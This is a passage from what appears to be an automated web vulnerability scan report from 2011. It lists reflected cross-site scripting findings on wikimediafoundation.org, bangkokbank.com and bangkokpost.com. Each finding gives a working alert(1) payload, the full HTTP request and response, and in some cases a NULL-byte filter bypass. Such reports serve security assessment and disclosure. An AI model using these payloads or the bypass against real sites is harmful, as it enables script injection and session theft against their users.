<a href="http://en.wikipedia.org/wiki/Special:Landingcheck%00e5fe7"><script>alert(1)</script>584d06cffe9" title="Wikipedia:Special:Landingcheck%00e5fe7">
...[SNIP]...

5.56. http://wikimediafoundation.org/wiki/Terms_of_Use [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://wikimediafoundation.org
Path:   /wiki/Terms_of_Use

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %008f2cf"><script>alert(1)</script>3a4264d3ec6 was submitted in the REST URL parameter 2. This input was echoed as 8f2cf"><script>alert(1)</script>3a4264d3ec6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /wiki/Terms_of_Use%008f2cf"><script>alert(1)</script>3a4264d3ec6 HTTP/1.1
Host: wikimediafoundation.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Tue, 03 May 2011 13:30:10 GMT
Server: Apache
Cache-Control: private, s-maxage=0, max-age=0, must-revalidate
X-Wikimedia-Debug: prot=http:// serv=wikimediafoundation.org loc=/wiki/Terms_of_Use%008f2cf"><script>alert(1)</script>3a4264d3ec6
Content-Length: 5482
Content-Type: text/html; charset=utf-8
X-Cache: MISS from sq73.wikimedia.org
X-Cache-Lookup: MISS from sq73.wikimedia.org:3128
X-Cache: MISS from sq61.wikimedia.org
X-Cache-Lookup: MISS from sq61.wikimedia.org:80
Connection: close

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Wikimedia page not found: http://wikimediafoundation.org/wiki/Terms_of_Use
...[SNIP]...
<a href="http://en.wikipedia.org/wiki/Terms_of_Use%008f2cf"><script>alert(1)</script>3a4264d3ec6" title="Wikipedia:Terms_of_Use%008f2cf">
...[SNIP]...

5.57. http://wikimediafoundation.org/wiki/Terms_of_Use [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://wikimediafoundation.org
Path:   /wiki/Terms_of_Use

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload %00bc49e<script>alert(1)</script>848b1fa4b4e was submitted in the REST URL parameter 2. This input was echoed as bc49e<script>alert(1)</script>848b1fa4b4e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /wiki/Terms_of_Use%00bc49e<script>alert(1)</script>848b1fa4b4e HTTP/1.1
Host: wikimediafoundation.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Tue, 03 May 2011 13:30:14 GMT
Server: Apache
Cache-Control: private, s-maxage=0, max-age=0, must-revalidate
X-Wikimedia-Debug: prot=http:// serv=wikimediafoundation.org loc=/wiki/Terms_of_Use%00bc49e<script>alert(1)</script>848b1fa4b4e
Content-Length: 5454
Content-Type: text/html; charset=utf-8
X-Cache: MISS from sq40.wikimedia.org
X-Cache-Lookup: MISS from sq40.wikimedia.org:3128
X-Cache: MISS from sq61.wikimedia.org
X-Cache-Lookup: MISS from sq61.wikimedia.org:80
Connection: close

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Wikimedia page not found: http://wikimediafoundation.org/wiki/Terms_of_Use
...[SNIP]...
<p style="font-weight: bold;">To check for "Terms_of_Use%00bc49e<script>alert(1)</script>848b1fa4b4e" on Wikipedia, see:
<a href="http://en.wikipedia.org/wiki/Terms_of_Use%00bc49e<script>
...[SNIP]...

5.58. http://www.bangkokbank.com/_layouts/NR/JavaScript/truehitsstat.asp [pagename parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bangkokbank.com
Path:   /_layouts/NR/JavaScript/truehitsstat.asp

Issue detail

The value of the pagename request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fa217'-alert(1)-'5c2eb6720ac was submitted in the pagename parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /_layouts/NR/JavaScript/truehitsstat.asp?pagename=Home-Enfa217'-alert(1)-'5c2eb6720ac HTTP/1.1
Host: www.bangkokbank.com
Proxy-Connection: keep-alive
Referer: http://www.bangkokbank.com/bangkok%20bank/pages/main.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 471
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCQDDQRCA=NENLAAIDBKCAOPEEJBJONJHM; path=/
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 11:45:04 GMT
Age: 0
Proxy-Connection: close
Via: HTTP/1.1 BangkokBank.com (0 [cMsSf ])

<script language='javascript1.1'>
   page='Home-Enfa217'-alert(1)-'5c2eb6720ac';
</script>
<script language='javascript1.1' src='http://hits.truehits.in.th/data/k0019767.js'> </script>
<NOSCRIPT>

...[SNIP]...

5.59. http://www.bangkokpost.com/business/company-in-thailand/financial/banking/search/x26amp [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bangkokpost.com
Path:   /business/company-in-thailand/financial/banking/search/x26amp

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload ec3bb<img%20src%3da%20onerror%3dalert(1)>65f25eabc was submitted in the REST URL parameter 2. This input was echoed as ec3bb<img src=a onerror=alert(1)>65f25eabc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /business/company-in-thailandec3bb<img%20src%3da%20onerror%3dalert(1)>65f25eabc/financial/banking/search/x26amp HTTP/1.1
Host: www.bangkokpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:40:10 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: __se=YTo2OntzOjk6IlNFU1NJT05JRCI7czoyNjoibnZqMzcycHRvZWV2amJ1bms4ZzQ0Zm5kNjMiO3M6MTQ6IkNPT0tJRV9TRVNTSU9OIjtzOjQ6Il9fc2UiO3M6MjA6IlNUQVRVU19TVEFSVF9TRVNTSU9OIjtzOjc6IlNVQ0NFU1MiO3M6MDoiIjtOO3M6OToiY29va2llX2lwIjtzOjE1OiIxNzMuMTkzLjIxNC4yNDMiO3M6NjoiU1RBVFVTIjtzOjc6InN1Y2Nlc3MiO30%3D; path=/; domain=.bangkokpost.com; httponly
Set-Cookie: PHPSESSID=n4grvdblctaiapmpo88fel46d2; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 21330

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Bangkokpost : B
...[SNIP]...
<h1 class="mainTitle">Bangkok Post : Bangkokpost : Business | company-in-thailandec3bb<img src=a onerror=alert(1)>65f25eabc | financial | banking | search | x26amp</h1>
...[SNIP]...

5.60. http://www.bangkokpost.com/business/company-in-thailand/financial/banking/search/x26amp [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bangkokpost.com
Path:   /business/company-in-thailand/financial/banking/search/x26amp

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7a012"><script>alert(1)</script>93f424d8ca7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /business/company-in-thailand7a012"><script>alert(1)</script>93f424d8ca7/financial/banking/search/x26amp HTTP/1.1
Host: www.bangkokpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:40:03 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: __se=YTo2OntzOjk6IlNFU1NJT05JRCI7czoyNjoiY2NhbjJpN3NibTM3anBlYmNwbjZzbzI0aTQiO3M6MTQ6IkNPT0tJRV9TRVNTSU9OIjtzOjQ6Il9fc2UiO3M6MjA6IlNUQVRVU19TVEFSVF9TRVNTSU9OIjtzOjc6IlNVQ0NFU1MiO3M6MDoiIjtOO3M6OToiY29va2llX2lwIjtzOjE1OiIxNzMuMTkzLjIxNC4yNDMiO3M6NjoiU1RBVFVTIjtzOjc6InN1Y2Nlc3MiO30%3D; path=/; domain=.bangkokpost.com; httponly
Set-Cookie: PHPSESSID=isiu2bkpa8h9e5vt84j7i3srd2; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 21383

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Bangkokpost : B
...[SNIP]...
<form method="post" action="/business/company-in-thailand7a012"><script>alert(1)</script>93f424d8ca7/financial/banking/search/" id="travelSearch" onsubmit="return chkQuery('key','travelSearch','/business/company-in-thailand7a012">
...[SNIP]...

5.61. http://www.bangkokpost.com/business/company-in-thailand/financial/banking/search/x26amp [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bangkokpost.com
Path:   /business/company-in-thailand/financial/banking/search/x26amp

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 5d5be<img%20src%3da%20onerror%3dalert(1)>8ebb9de52a8 was submitted in the REST URL parameter 3. This input was echoed as 5d5be<img src=a onerror=alert(1)>8ebb9de52a8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /business/company-in-thailand/financial5d5be<img%20src%3da%20onerror%3dalert(1)>8ebb9de52a8/banking/search/x26amp HTTP/1.1
Host: www.bangkokpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:40:58 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: __se=YTo2OntzOjk6IlNFU1NJT05JRCI7czoyNjoibHZ0MWhzdXQ0NmVpN2JkNWkwMWV1MmY4YTUiO3M6MTQ6IkNPT0tJRV9TRVNTSU9OIjtzOjQ6Il9fc2UiO3M6MjA6IlNUQVRVU19TVEFSVF9TRVNTSU9OIjtzOjc6IlNVQ0NFU1MiO3M6MDoiIjtOO3M6OToiY29va2llX2lwIjtzOjE1OiIxNzMuMTkzLjIxNC4yNDMiO3M6NjoiU1RBVFVTIjtzOjc6InN1Y2Nlc3MiO30%3D; path=/; domain=.bangkokpost.com; httponly
Set-Cookie: PHPSESSID=pqti96v7gaphsldjbjem6l2qf0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 21432

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Bangkokpost : B
...[SNIP]...
<h1 class="mainTitle">Bangkok Post : Bangkokpost : Business | Company in Thailand | financial5d5be<img src=a onerror=alert(1)>8ebb9de52a8 | banking | search | x26amp</h1>
...[SNIP]...

5.62. http://www.bangkokpost.com/business/company-in-thailand/financial/banking/search/x26amp [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bangkokpost.com
Path:   /business/company-in-thailand/financial/banking/search/x26amp

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 27762"><script>alert(1)</script>e1fd3f25b24 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /business/company-in-thailand/financial27762"><script>alert(1)</script>e1fd3f25b24/banking/search/x26amp HTTP/1.1
Host: www.bangkokpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:40:45 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: __se=YTo2OntzOjk6IlNFU1NJT05JRCI7czoyNjoiNXZnaTk0cTRoYWgzdnE2aHI2Z29oMG84NTAiO3M6MTQ6IkNPT0tJRV9TRVNTSU9OIjtzOjQ6Il9fc2UiO3M6MjA6IlNUQVRVU19TVEFSVF9TRVNTSU9OIjtzOjc6IlNVQ0NFU1MiO3M6MDoiIjtOO3M6OToiY29va2llX2lwIjtzOjE1OiIxNzMuMTkzLjIxNC4yNDMiO3M6NjoiU1RBVFVTIjtzOjc6InN1Y2Nlc3MiO30%3D; path=/; domain=.bangkokpost.com; httponly
Set-Cookie: PHPSESSID=u70jpo9vrbo0ps3iq68q57jcj0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 21496

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Bangkokpost : B
...[SNIP]...
<form method="post" action="/business/company-in-thailand/financial27762"><script>alert(1)</script>e1fd3f25b24/banking/search/" id="travelSearch" onsubmit="return chkQuery('key','travelSearch','/business/company-in-thailand/financial27762">
...[SNIP]...

5.63. http://www.bangkokpost.com/business/company-in-thailand/financial/banking/search/x26amp [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bangkokpost.com
Path:   /business/company-in-thailand/financial/banking/search/x26amp

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1a3d3"><script>alert(1)</script>63054be99cc was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /business/company-in-thailand/financial/banking1a3d3"><script>alert(1)</script>63054be99cc/search/x26amp HTTP/1.1
Host: www.bangkokpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:41:40 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: __se=YTo2OntzOjk6IlNFU1NJT05JRCI7czoyNjoic2o3OHY0b3F1dm80bXUxdDRzdWRpOTFuOTMiO3M6MTQ6IkNPT0tJRV9TRVNTSU9OIjtzOjQ6Il9fc2UiO3M6MjA6IlNUQVRVU19TVEFSVF9TRVNTSU9OIjtzOjc6IlNVQ0NFU1MiO3M6MDoiIjtOO3M6OToiY29va2llX2lwIjtzOjE1OiIxNzMuMTkzLjIxNC4yNDMiO3M6NjoiU1RBVFVTIjtzOjc6InN1Y2Nlc3MiO30%3D; path=/; domain=.bangkokpost.com; httponly
Set-Cookie: PHPSESSID=lsn7e54cjiqnb6ttvmvf9fs5u1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 21517

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Bangkokpost : B
...[SNIP]...
<form method="post" action="/business/company-in-thailand/financial/banking1a3d3"><script>alert(1)</script>63054be99cc/search/" id="travelSearch" onsubmit="return chkQuery('key','travelSearch','/business/company-in-thailand/financial/banking1a3d3">
...[SNIP]...

5.64. http://www.bangkokpost.com/business/company-in-thailand/financial/banking/search/x26amp [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bangkokpost.com
Path:   /business/company-in-thailand/financial/banking/search/x26amp

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 83b36<img%20src%3da%20onerror%3dalert(1)>e346f5ddf0f was submitted in the REST URL parameter 4. This input was echoed as 83b36<img src=a onerror=alert(1)>e346f5ddf0f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /business/company-in-thailand/financial/banking83b36<img%20src%3da%20onerror%3dalert(1)>e346f5ddf0f/search/x26amp HTTP/1.1
Host: www.bangkokpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:41:49 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: __se=YTo2OntzOjk6IlNFU1NJT05JRCI7czoyNjoiMWlxZzljN3ZhZWJxODA4OGRna2w0MjNlaTUiO3M6MTQ6IkNPT0tJRV9TRVNTSU9OIjtzOjQ6Il9fc2UiO3M6MjA6IlNUQVRVU19TVEFSVF9TRVNTSU9OIjtzOjc6IlNVQ0NFU1MiO3M6MDoiIjtOO3M6OToiY29va2llX2lwIjtzOjE1OiIxNzMuMTkzLjIxNC4yNDMiO3M6NjoiU1RBVFVTIjtzOjc6InN1Y2Nlc3MiO30%3D; path=/; domain=.bangkokpost.com; httponly
Set-Cookie: PHPSESSID=bftqc78l5mptb763uo0kvnt0v7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 21444

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Bangkokpost : B
...[SNIP]...
<h1 class="mainTitle">Bangkok Post : Bangkokpost : Business | Company in Thailand | Financial | banking83b36<img src=a onerror=alert(1)>e346f5ddf0f | search | x26amp</h1>
...[SNIP]...

5.65. http://www.bangkokpost.com/business/company-in-thailand/financial/banking/search/x26amp [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bangkokpost.com
Path:   /business/company-in-thailand/financial/banking/search/x26amp

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 36498<img%20src%3da%20onerror%3dalert(1)>4d8fe330711 was submitted in the REST URL parameter 5. This input was echoed as 36498<img src=a onerror=alert(1)>4d8fe330711 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /business/company-in-thailand/financial/banking/search36498<img%20src%3da%20onerror%3dalert(1)>4d8fe330711/x26amp HTTP/1.1
Host: www.bangkokpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:42:33 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: __se=YTo2OntzOjk6IlNFU1NJT05JRCI7czoyNjoiZDI2b20wMGM2aHJxOGUzaWJhajJidG42ZTEiO3M6MTQ6IkNPT0tJRV9TRVNTSU9OIjtzOjQ6Il9fc2UiO3M6MjA6IlNUQVRVU19TVEFSVF9TRVNTSU9OIjtzOjc6IlNVQ0NFU1MiO3M6MDoiIjtOO3M6OToiY29va2llX2lwIjtzOjE1OiIxNzMuMTkzLjIxNC4yNDMiO3M6NjoiU1RBVFVTIjtzOjc6InN1Y2Nlc3MiO30%3D; path=/; domain=.bangkokpost.com; httponly
Set-Cookie: PHPSESSID=i4eous98l4tg4heijh182en9t0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 30426

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Bangkokpost : B
...[SNIP]...
<h1 class="mainTitle">Bangkok Post : Bangkokpost : Business | Company in Thailand | Financial | Banking | search36498<img src=a onerror=alert(1)>4d8fe330711 | x26amp</h1>
...[SNIP]...

5.66. http://www.bangkokpost.com/business/company-in-thailand/financial/banking/search/x26amp [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bangkokpost.com
Path:   /business/company-in-thailand/financial/banking/search/x26amp

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f0d17"><img%20src%3da%20onerror%3dalert(1)>d9375727ebd was submitted in the REST URL parameter 6. This input was echoed as f0d17"><img src=a onerror=alert(1)>d9375727ebd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /business/company-in-thailand/financial/banking/search/x26ampf0d17"><img%20src%3da%20onerror%3dalert(1)>d9375727ebd HTTP/1.1
Host: www.bangkokpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:43:28 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: __se=YTo2OntzOjk6IlNFU1NJT05JRCI7czoyNjoiMjJjNmEyYjdwaXE5dDZucWcxYnVpMTliajMiO3M6MTQ6IkNPT0tJRV9TRVNTSU9OIjtzOjQ6Il9fc2UiO3M6MjA6IlNUQVRVU19TVEFSVF9TRVNTSU9OIjtzOjc6IlNVQ0NFU1MiO3M6MDoiIjtOO3M6OToiY29va2llX2lwIjtzOjE1OiIxNzMuMTkzLjIxNC4yNDMiO3M6NjoiU1RBVFVTIjtzOjc6InN1Y2Nlc3MiO30%3D; path=/; domain=.bangkokpost.com; httponly
Set-Cookie: PHPSESSID=kaigrgm1gs0eaesphdm3teov90; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 21648

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Bangkokpost : B
...[SNIP]...
<meta name="keywords" content="news,breaking news,latest news, Business, Company in Thailand, Financial, Banking : x26ampf0d17"><img src=a onerror=alert(1)>d9375727ebd, current news,world news,national news,business news,Thai news" />
...[SNIP]...

5.67. http://www.bangkokpost.com/business/company-in-thailand/financial/banking/search/x26amp [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bangkokpost.com
Path:   /business/company-in-thailand/financial/banking/search/x26amp

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload f519c<img%20src%3da%20onerror%3dalert(1)>2097ffaf22f was submitted in the REST URL parameter 6. This input was echoed as f519c<img src=a onerror=alert(1)>2097ffaf22f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /business/company-in-thailand/financial/banking/search/x26ampf519c<img%20src%3da%20onerror%3dalert(1)>2097ffaf22f HTTP/1.1
Host: www.bangkokpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:43:53 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: __se=YTo2OntzOjk6IlNFU1NJT05JRCI7czoyNjoiMmRqb21ub2QzYmxrcHVwNDk1cThycG5sNTIiO3M6MTQ6IkNPT0tJRV9TRVNTSU9OIjtzOjQ6Il9fc2UiO3M6MjA6IlNUQVRVU19TVEFSVF9TRVNTSU9OIjtzOjc6IlNVQ0NFU1MiO3M6MDoiIjtOO3M6OToiY29va2llX2lwIjtzOjE1OiIxNzMuMTkzLjIxNC4yNDMiO3M6NjoiU1RBVFVTIjtzOjc6InN1Y2Nlc3MiO30%3D; path=/; domain=.bangkokpost.com; httponly
Set-Cookie: PHPSESSID=jg7756afjgk1mirp5hi6adejb0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 21630

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Bangkokpost : B
...[SNIP]...
<h1 class="mainTitle">Bangkok Post : Bangkokpost : Business | Company in Thailand | Financial | Banking | search | x26ampf519c<img src=a onerror=alert(1)>2097ffaf22f</h1>
...[SNIP]...

5.68. http://www.bangkokpost.com/business/company-in-thailand/financial/search/x26amp [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bangkokpost.com
Path:   /business/company-in-thailand/financial/search/x26amp

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b6a76"><script>alert(1)</script>5e0e2a10af5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /business/company-in-thailandb6a76"><script>alert(1)</script>5e0e2a10af5/financial/search/x26amp HTTP/1.1
Host: www.bangkokpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:40:22 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
